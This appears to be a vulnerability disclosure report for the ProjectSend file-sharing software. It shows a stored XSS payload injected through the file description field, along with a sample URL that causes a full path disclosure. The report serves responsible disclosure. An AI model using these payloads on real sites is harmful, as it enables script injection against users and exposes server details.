# Exploiting Description - Get into code xss in the box of image description.
<textarea placeholder="Optionally, enter here a description for the file."
name="file[1][description]">DESCRIPTION</textarea>
#P0c
"><img src=x onerror=;;alert('XSS') />
<textarea placeholder="Optionally, enter here a description for the file."
name="file[1][description]">CODE XSS</textarea>
#Proof Concept
http://i.imgur.com/FOPIvd4.jpg
------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform.
#P0c
http://site.com/projectsend/templates/pinboxes/template.php
#Proof Concept
http://i.imgur.com/xfN4kDV.jpg
Please secure this wonderful software asap.
Cheers
Original issue reported on code.google.com by unrealtr...@gmail.com on 25 May 2015 at 9:21
Original issue reported on code.google.com by
unrealtr...@gmail.com
on 25 May 2015 at 9:21